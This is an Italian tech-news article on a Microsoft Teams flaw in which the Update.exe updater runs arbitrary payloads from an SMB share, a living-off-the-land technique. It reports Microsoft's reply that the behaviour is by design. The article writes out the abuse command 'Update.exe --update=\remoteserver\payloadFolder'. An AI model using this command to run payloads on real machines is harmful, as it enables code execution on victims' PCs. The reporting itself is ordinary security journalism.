E’ stata scoperta una grave vulnerabilità in Microsoft Teams, nota app utilizzata per videoconferenze e lezioni online, che permetterebbe ad un hacker di diffondere potenziali malware sfruttando lo strumento di update dell’applicazione.

Tutti conosceranno, o avranno imparato a conoscere, Microsoft Teams, servizio sviluppato con lo scopo di semplificare le videochiamate di gruppo e le riunioni. Complice anche il lockdown, Teams è stato uno dei servizi più utilizzati al mondo insieme a Zoom, che però a riscontrato delle gravi falle che ne hanno compromesso la sicurezza. Sembra però che nemmeno Microsoft Teams sia il massimo in fatto di sicurezza, tant’è che è stata rinvenuta una falla che sfrutta l’updater del servizio per poter iniettare dei malware o comunque software pericolosi. Tempo fa era già stata scoperta una vulnerabilità che si basava sull’utilizzo del comando “update” per avviare codice arbitrario, risolto successivamente tramite una semplice patch. Questa volta però il problema sembra molto più grave, in quanto una possibile soluzione al problema andrebbe ad impattare negativamente su determinate funzionalità di Teams.

A scoprire la falla è stato Reegun Richard, ingegnere che tramite operazioni di reverse engineering ha individuato come l’applicativo “Update.exe“, responsabile dell’aggiornamento di Microsoft Teams, permetta di eseguire qualsiasi codice da qualunque posizione. Ciò significa che la soluzione adottata precedentemente da Microsoft non sembra aver risolto molto.

La patch precedentemente fornita a Teams era quella di limitare la sua capacità di aggiornamento tramite un URL. Al contrario, il programma di aggiornamento consente le connessioni locali tramite una condivisione o una cartella locale per gli aggiornamenti dei prodotti“, afferma Reegun Jayapaul, Lead Threat Architect per SpiderLabs in Trustwave.

Così i ricercatori hanno evidenziato come sia possibile utilizzare un file qualunque condiviso tramite SMB, il sistema di Windows dedicato a file e cartelle condivise nella rete locale, da poter iniettare nell’applicazione. Questo tipo di attacco è detto Living off the Land binary (LoLBin), in quanto un hacker può eseguire qualunque payload da remoto direttamente nel PC della vittima. Per eseguire un attacco di questo tipo servono comunque delle conoscenze abbastanza avanzate, in quanto è necessario creare un server che possa supportare l’accesso remoto e poi eseguire il comando Update.exe –update=\remoteserver\payloadFolder per eseguire il payload. Altro requisito è che il payload sia compresso in un particolare formato e che sia rinominato in maniera molto specifica, così che Microsoft Teams possa riconoscerlo ed eseguirlo, altrimenti verrebbe istantaneamente bloccato.

I ricercatori hanno prontamente contattato Microsoft per spiegare il problema, che hanno replicato con: “Grazie ancora per aver segnalato questo problema a Microsoft. Abbiamo stabilito che questo comportamento è progettato volutamente, non possiamo limitare la fonte SMB per –update perché abbiamo clienti che apparentemente si affidano a questo (ad es. reindirizzamento delle cartelle)“.

Attualmente quindi il problema sembra essere irrisolvibile, ma sfruttare questa falla non è certamente operazione per tutti.

Di Marco Nisticò

Sviluppatore informatico, cerco sempre di stare al passo con i tempi in un mondo ormai circondato dalla tecnologia.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.